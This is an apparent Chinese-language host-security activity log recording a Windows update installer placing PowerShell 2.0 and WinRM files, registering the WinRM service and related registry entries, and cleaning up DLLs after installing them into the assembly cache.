2016-5-14 星期六 23:52:42        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建文件        C:\WINDOWS\system32\winrsmgr.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:52:42        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建文件        C:\WINDOWS\system32\winrssrv.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:52:43        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建文件        C:\WINDOWS\system32\wsmanhttpconfig.exe        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.exe        
2016-5-14 星期六 23:52:43        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建文件        C:\WINDOWS\system32\wsmplpxy.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:52:44        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建文件        C:\WINDOWS\system32\winrmprov.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:52:44        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建文件        C:\WINDOWS\system32\wsmprovhost.exe        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.exe        
2016-5-14 星期六 23:52:45        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建文件        C:\WINDOWS\system32\wevtfwd.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:52:47        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建文件        C:\WINDOWS\system32\WindowsPowerShell\v1.0\Microsoft.PowerShell.Commands.Diagnostics.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:52:47        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建文件        C:\WINDOWS\system32\WindowsPowerShell\v1.0\Microsoft.PowerShell.Commands.Management.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:52:48        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建文件        C:\WINDOWS\system32\WindowsPowerShell\v1.0\Microsoft.PowerShell.Commands.Utility.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:52:48        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建文件        C:\WINDOWS\system32\WindowsPowerShell\v1.0\Microsoft.PowerShell.ConsoleHost.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:52:49        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建文件        C:\WINDOWS\system32\WindowsPowerShell\v1.0\Microsoft.PowerShell.Security.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:52:49        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建文件        C:\WINDOWS\system32\WindowsPowerShell\v1.0\Microsoft.WSMan.Runtime.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:52:50        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建文件        C:\WINDOWS\system32\WindowsPowerShell\v1.0\Microsoft.WSMan.Management.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:52:50        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建文件        C:\WINDOWS\system32\WindowsPowerShell\v1.0\Microsoft.BackgroundIntelligentTransfer.Management.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:52:51        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建文件        C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.exe        
2016-5-14 星期六 23:52:51        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建文件        C:\WINDOWS\system32\WindowsPowerShell\v1.0\pwrshmsg.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:52:52        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建文件        C:\WINDOWS\system32\WindowsPowerShell\v1.0\pwrshsip.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:52:52        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建文件        C:\WINDOWS\system32\WindowsPowerShell\v1.0\pspluginwkr.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:52:53        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建文件        C:\WINDOWS\system32\WindowsPowerShell\v1.0\System.Management.Automation.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:52:54        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建文件        C:\WINDOWS\system32\WindowsPowerShell\v1.0\Microsoft.PowerShell.Commands.Diagnostics.resources.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:52:54        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建文件        C:\WINDOWS\system32\WindowsPowerShell\v1.0\Microsoft.PowerShell.Commands.Management.resources.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:52:54        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建文件        C:\WINDOWS\system32\WindowsPowerShell\v1.0\Microsoft.PowerShell.Commands.Utility.resources.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:52:55        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建文件        C:\WINDOWS\system32\WindowsPowerShell\v1.0\Microsoft.PowerShell.ConsoleHost.resources.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:52:55        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建文件        C:\WINDOWS\system32\WindowsPowerShell\v1.0\Microsoft.PowerShell.Security.resources.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:52:56        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建文件        C:\WINDOWS\system32\WindowsPowerShell\v1.0\Microsoft.WSMan.Management.Resources.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:52:56        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建文件        C:\WINDOWS\system32\WindowsPowerShell\v1.0\System.Management.Automation.resources.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:52:57        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建文件        C:\WINDOWS\system32\WindowsPowerShell\v1.0\Microsoft.BackgroundIntelligentTransfer.Management.resources.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:52:57        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建文件        C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe.mui        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.mui        
2016-5-14 星期六 23:53:01        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建文件        C:\WINDOWS\$968930Uinstall_KB968930$\PSCustomSetupUtil.exe        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.exe        
2016-5-14 星期六 23:53:02        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建文件        C:\WINDOWS\$968930Uinstall_KB968930$\PSSetupNativeUtils.exe        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.exe        
2016-5-14 星期六 23:53:02        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建文件        C:\WINDOWS\system32\pwrshplugin.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:53:03        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建文件        C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\BitsTransfer\microsoft.backgroundintelligenttransfer.management.interop.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:53:04        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建文件        C:\WINDOWS\help\WindowsPowerShellHelp.chm        允许        [文件组]所有执行文件 -> [文件]*; *.chm        
2016-5-14 星期六 23:53:05        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建文件        C:\WINDOWS\system32\WindowsPowerShell\v1.0\CompiledComposition.Microsoft.PowerShell.GPowerShell.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:53:06        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建文件        C:\WINDOWS\system32\WindowsPowerShell\v1.0\Microsoft.PowerShell.GPowerShell.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:53:06        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建文件        C:\WINDOWS\system32\WindowsPowerShell\v1.0\Microsoft.PowerShell.Editor.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:53:07        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建文件        C:\WINDOWS\system32\WindowsPowerShell\v1.0\Microsoft.PowerShell.GraphicalHost.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:53:08        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建文件        C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell_ise.exe        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.exe        
2016-5-14 星期六 23:53:09        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建文件        C:\WINDOWS\system32\WindowsPowerShell\v1.0\Microsoft.PowerShell.GPowerShell.resources.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:53:09        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建文件        C:\WINDOWS\system32\WindowsPowerShell\v1.0\Microsoft.PowerShell.Editor.resources.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:53:10        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建文件        C:\WINDOWS\system32\WindowsPowerShell\v1.0\Microsoft.PowerShell.GraphicalHost.resources.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:53:11        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建文件        C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell_ise.resources.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:53:12        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建注册表项        HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinRM        允许        [注册表组]自动运行程序所在位置 -> [注册表]HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services        
2016-5-14 星期六 23:53:12        c:\02dbcaae2af0f0c0a87287\update\update.exe        修改注册表值        HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinRM\ImagePath        允许        [注册表组]自动运行程序所在位置 -> [注册表]HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\*; ImagePath        值: C:\WINDOWS\System32\svchost.exe -k WinRM
2016-5-14 星期六 23:53:13        c:\02dbcaae2af0f0c0a87287\update\update.exe        修改注册表值        HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinRM\Parameters\ServiceDll        允许        [注册表组]自动运行程序所在位置 -> [注册表]HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\*; ServiceDll        值: %SystemRoot%\system32\WsmSvc.dll
2016-5-14 星期六 23:53:13        c:\02dbcaae2af0f0c0a87287\update\update.exe        修改注册表值        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\WINRM        允许        [注册表组]系统设置 -> [注册表]HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost        值: WINRM
2016-5-14 星期六 23:53:14        c:\02dbcaae2af0f0c0a87287\update\update.exe        修改注册表值        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\InprocServer32        允许        [注册表组]系统设置 -> [注册表]HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\*\InProcServer32        值: C:\WINDOWS\system32\WSMAUTO.DLL
2016-5-14 星期六 23:53:14        c:\02dbcaae2af0f0c0a87287\update\update.exe        修改注册表值        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}\LocalServer32        允许        [注册表组]系统设置 -> [注册表]HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\*\LocalServer32        值: C:\WINDOWS\system32\winrshost.exe
2016-5-14 星期六 23:53:15        c:\02dbcaae2af0f0c0a87287\update\update.exe        修改注册表值        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Microsoft.PowerShellScript.1\shell\Run with PowerShell\command        允许        [注册表组]系统设置 -> [注册表]HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\command        值: "C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe" "-file" "%1"
2016-5-14 星期六 23:53:16        c:\02dbcaae2af0f0c0a87287\update\update.exe        修改注册表值        HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment\PSModulePath        允许        [注册表组]系统设置 -> [注册表]HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment        值: C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\
2016-5-14 星期六 23:53:17        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\wsmanhttpconfig.exe        允许        [应用程序]*        命令行: C:\WINDOWS\system32\wsmanhttpconfig.exe install
2016-5-14 星期六 23:53:18        c:\windows\system32\wsmanhttpconfig.exe        创建新进程        c:\windows\system32\conime.exe        允许        [应用程序]*        命令行: C:\WINDOWS\system32\conime.exe
2016-5-14 星期六 23:53:20        c:\windows\system32\wsmanhttpconfig.exe        安装驱动程序或服务        %SystemRoot%\system32\svchost.exe -k WINRM        允许        [应用程序]*        
2016-5-14 星期六 23:53:20        c:\windows\system32\services.exe        修改注册表值        HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinRM\Start        允许        [注册表组]自动运行程序所在位置 -> [注册表]HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\*; Start        值: 0x00000003(3)
2016-5-14 星期六 23:53:21        c:\windows\system32\services.exe        修改注册表值        HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinRM\ImagePath        允许        [注册表组]自动运行程序所在位置 -> [注册表]HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\*; ImagePath        值: %SystemRoot%\system32\svchost.exe -k WINRM
2016-5-14 星期六 23:53:22        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\wbem\mofcomp.exe        允许        [应用程序]*        命令行: C:\WINDOWS\system32\wbem\mofcomp.exe C:\WINDOWS\system32\winrmprov.mof
2016-5-14 星期六 23:53:24        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\$968930uinstall_kb968930$\pscustomsetuputil.exe        允许        [应用程序]*        命令行: "C:\WINDOWS\$968930Uinstall_KB968930$\PSCustomSetupUtil.exe" /install "C:\WINDOWS\system32\WindowsPowerShell\v1.0\System.Management.Automation.dll"
2016-5-14 星期六 23:53:26        c:\windows\$968930uinstall_kb968930$\pscustomsetuputil.exe        创建文件        C:\WINDOWS\assembly\tmp\JY5BHOU0\System.Management.Automation.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:53:27        c:\windows\$968930uinstall_kb968930$\pscustomsetuputil.exe        创建文件        C:\WINDOWS\assembly\tmp\ZKSY5L2C\Microsoft.PowerShell.ConsoleHost.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:53:29        c:\windows\$968930uinstall_kb968930$\pscustomsetuputil.exe        创建文件        C:\WINDOWS\assembly\tmp\VOW39GMU\Microsoft.PowerShell.Commands.Management.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:53:30        c:\windows\$968930uinstall_kb968930$\pscustomsetuputil.exe        创建文件        C:\WINDOWS\assembly\tmp\CV39GMTZ\Microsoft.PowerShell.Commands.Utility.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:53:30        c:\windows\$968930uinstall_kb968930$\pscustomsetuputil.exe        创建文件        C:\WINDOWS\assembly\tmp\LT4FOZ9G\Microsoft.PowerShell.Security.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:53:31        c:\windows\$968930uinstall_kb968930$\pscustomsetuputil.exe        创建文件        C:\WINDOWS\assembly\tmp\7WBHX5EM\Microsoft.PowerShell.Commands.Diagnostics.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:53:32        c:\windows\$968930uinstall_kb968930$\pscustomsetuputil.exe        创建文件        C:\WINDOWS\assembly\tmp\7AJT07EK\Microsoft.WSMan.Runtime.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:53:32        c:\windows\$968930uinstall_kb968930$\pscustomsetuputil.exe        创建文件        C:\WINDOWS\assembly\tmp\H5GQ1BLU\Microsoft.WSMan.Management.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:53:33        c:\windows\$968930uinstall_kb968930$\pscustomsetuputil.exe        创建文件        C:\WINDOWS\assembly\tmp\H3CJS09H\Microsoft.BackgroundIntelligentTransfer.Management.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:53:34        c:\windows\$968930uinstall_kb968930$\pscustomsetuputil.exe        创建文件        C:\WINDOWS\assembly\tmp\TOX4BHOU\System.Management.Automation.resources.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:53:35        c:\windows\$968930uinstall_kb968930$\pscustomsetuputil.exe        创建文件        C:\WINDOWS\assembly\tmp\EHPW29FL\Microsoft.PowerShell.ConsoleHost.resources.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:53:35        c:\windows\$968930uinstall_kb968930$\pscustomsetuputil.exe        创建文件        C:\WINDOWS\assembly\tmp\IY5BIPV2\Microsoft.PowerShell.Commands.Management.resources.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:53:36        c:\windows\$968930uinstall_kb968930$\pscustomsetuputil.exe        创建文件        C:\WINDOWS\assembly\tmp\P3CJPV28\Microsoft.PowerShell.Commands.Utility.resources.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:53:36        c:\windows\$968930uinstall_kb968930$\pscustomsetuputil.exe        创建文件        C:\WINDOWS\assembly\tmp\HZ8GPX5E\Microsoft.PowerShell.Security.resources.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:53:37        c:\windows\$968930uinstall_kb968930$\pscustomsetuputil.exe        创建文件        C:\WINDOWS\assembly\tmp\JW39GMSZ\Microsoft.PowerShell.Commands.Diagnostics.resources.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:53:38        c:\windows\$968930uinstall_kb968930$\pscustomsetuputil.exe        创建文件        C:\WINDOWS\assembly\tmp\HV18ELRX\Microsoft.WSMan.Management.resources.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:53:38        c:\windows\$968930uinstall_kb968930$\pscustomsetuputil.exe        创建文件        C:\WINDOWS\assembly\tmp\VDMV3CKS\Microsoft.BackgroundIntelligentTransfer.Management.resources.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:53:39        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: "C:\WINDOWS\system32\cmd.exe" /c "del /F /Q "C:\WINDOWS\system32\WindowsPowerShell\v1.0\System.Management.Automation.dll""
2016-5-14 星期六 23:53:39        c:\windows\system32\cmd.exe        删除文件        C:\WINDOWS\system32\WindowsPowerShell\v1.0\System.Management.Automation.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:53:40        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: "C:\WINDOWS\system32\cmd.exe" /c "del /F /Q "C:\WINDOWS\system32\WindowsPowerShell\v1.0\.\System.Management.Automation.resources.dll""
2016-5-14 星期六 23:53:40        c:\windows\system32\cmd.exe        删除文件        C:\WINDOWS\system32\WindowsPowerShell\v1.0\System.Management.Automation.resources.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:53:40        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: "C:\WINDOWS\system32\cmd.exe" /c "del /F /Q "C:\WINDOWS\system32\WindowsPowerShell\v1.0\Microsoft.PowerShell.ConsoleHost.dll""
2016-5-14 星期六 23:53:41        c:\windows\system32\cmd.exe        删除文件        C:\WINDOWS\system32\WindowsPowerShell\v1.0\Microsoft.PowerShell.ConsoleHost.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:53:41        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: "C:\WINDOWS\system32\cmd.exe" /c "del /F /Q "C:\WINDOWS\system32\WindowsPowerShell\v1.0\.\Microsoft.PowerShell.ConsoleHost.resources.dll""
2016-5-14 星期六 23:53:41        c:\windows\system32\cmd.exe        删除文件        C:\WINDOWS\system32\WindowsPowerShell\v1.0\Microsoft.PowerShell.ConsoleHost.resources.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:53:42        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: "C:\WINDOWS\system32\cmd.exe" /c "del /F /Q "C:\WINDOWS\system32\WindowsPowerShell\v1.0\Microsoft.PowerShell.Commands.Management.dll""
2016-5-14 星期六 23:53:42        c:\windows\system32\cmd.exe        删除文件        C:\WINDOWS\system32\WindowsPowerShell\v1.0\Microsoft.PowerShell.Commands.Management.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:53:42        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: "C:\WINDOWS\system32\cmd.exe" /c "del /F /Q "C:\WINDOWS\system32\WindowsPowerShell\v1.0\.\Microsoft.PowerShell.Commands.Management.resources.dll""
2016-5-14 星期六 23:53:43        c:\windows\system32\cmd.exe        删除文件        C:\WINDOWS\system32\WindowsPowerShell\v1.0\Microsoft.PowerShell.Commands.Management.resources.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:53:43        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: "C:\WINDOWS\system32\cmd.exe" /c "del /F /Q "C:\WINDOWS\system32\WindowsPowerShell\v1.0\Microsoft.PowerShell.Commands.Utility.dll""
2016-5-14 星期六 23:53:44        c:\windows\system32\cmd.exe        删除文件        C:\WINDOWS\system32\WindowsPowerShell\v1.0\Microsoft.PowerShell.Commands.Utility.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:53:44        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: "C:\WINDOWS\system32\cmd.exe" /c "del /F /Q "C:\WINDOWS\system32\WindowsPowerShell\v1.0\.\Microsoft.PowerShell.Commands.Utility.resources.dll""
2016-5-14 星期六 23:53:44        c:\windows\system32\cmd.exe        删除文件        C:\WINDOWS\system32\WindowsPowerShell\v1.0\Microsoft.PowerShell.Commands.Utility.resources.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:53:45        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: "C:\WINDOWS\system32\cmd.exe" /c "del /F /Q "C:\WINDOWS\system32\WindowsPowerShell\v1.0\Microsoft.PowerShell.Security.dll""
2016-5-14 星期六 23:53:45        c:\windows\system32\cmd.exe        删除文件        C:\WINDOWS\system32\WindowsPowerShell\v1.0\Microsoft.PowerShell.Security.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:53:45        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: "C:\WINDOWS\system32\cmd.exe" /c "del /F /Q "C:\WINDOWS\system32\WindowsPowerShell\v1.0\.\Microsoft.PowerShell.Security.resources.dll""
2016-5-14 星期六 23:53:46        c:\windows\system32\cmd.exe        删除文件        C:\WINDOWS\system32\WindowsPowerShell\v1.0\Microsoft.PowerShell.Security.resources.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:53:46        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: "C:\WINDOWS\system32\cmd.exe" /c "del /F /Q "C:\WINDOWS\system32\WindowsPowerShell\v1.0\Microsoft.PowerShell.Commands.Diagnostics.dll""
2016-5-14 星期六 23:53:47        c:\windows\system32\cmd.exe        删除文件        C:\WINDOWS\system32\WindowsPowerShell\v1.0\Microsoft.PowerShell.Commands.Diagnostics.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:53:47        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: "C:\WINDOWS\system32\cmd.exe" /c "del /F /Q "C:\WINDOWS\system32\WindowsPowerShell\v1.0\.\Microsoft.PowerShell.Commands.Diagnostics.resources.dll""
2016-5-14 星期六 23:53:47        c:\windows\system32\cmd.exe        删除文件        C:\WINDOWS\system32\WindowsPowerShell\v1.0\Microsoft.PowerShell.Commands.Diagnostics.resources.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:53:47        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: "C:\WINDOWS\system32\cmd.exe" /c "del /F /Q "C:\WINDOWS\system32\WindowsPowerShell\v1.0\Microsoft.WSMan.Runtime.dll""
2016-5-14 星期六 23:53:48        c:\windows\system32\cmd.exe        删除文件        C:\WINDOWS\system32\WindowsPowerShell\v1.0\Microsoft.WSMan.Runtime.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:53:48        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: "C:\WINDOWS\system32\cmd.exe" /c "del /F /Q "C:\WINDOWS\system32\WindowsPowerShell\v1.0\Microsoft.WSMan.Management.dll""
2016-5-14 星期六 23:53:49        c:\windows\system32\cmd.exe        删除文件        C:\WINDOWS\system32\WindowsPowerShell\v1.0\Microsoft.WSMan.Management.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:53:49        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: "C:\WINDOWS\system32\cmd.exe" /c "del /F /Q "C:\WINDOWS\system32\WindowsPowerShell\v1.0\.\Microsoft.WSMan.Management.resources.dll""
2016-5-14 星期六 23:53:49        c:\windows\system32\cmd.exe        删除文件        C:\WINDOWS\system32\WindowsPowerShell\v1.0\Microsoft.WSMan.Management.Resources.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
2016-5-14 星期六 23:53:50        c:\02dbcaae2af0f0c0a87287\update\update.exe        创建新进程        c:\windows\system32\cmd.exe        允许        [应用程序]*        命令行: "C:\WINDOWS\system32\cmd.exe" /c "del /F /Q "C:\WINDOWS\system32\WindowsPowerShell\v1.0\Microsoft.BackgroundIntelligentTransfer.Management.dll""
2016-5-14 星期六 23:53:50        c:\windows\system32\cmd.exe        删除文件        C:\WINDOWS\system32\WindowsPowerShell\v1.0\Microsoft.BackgroundIntelligentTransfer.Management.dll        允许        [文件组]系统执行文件 -> [文件]c:\windows\*; *.dll        
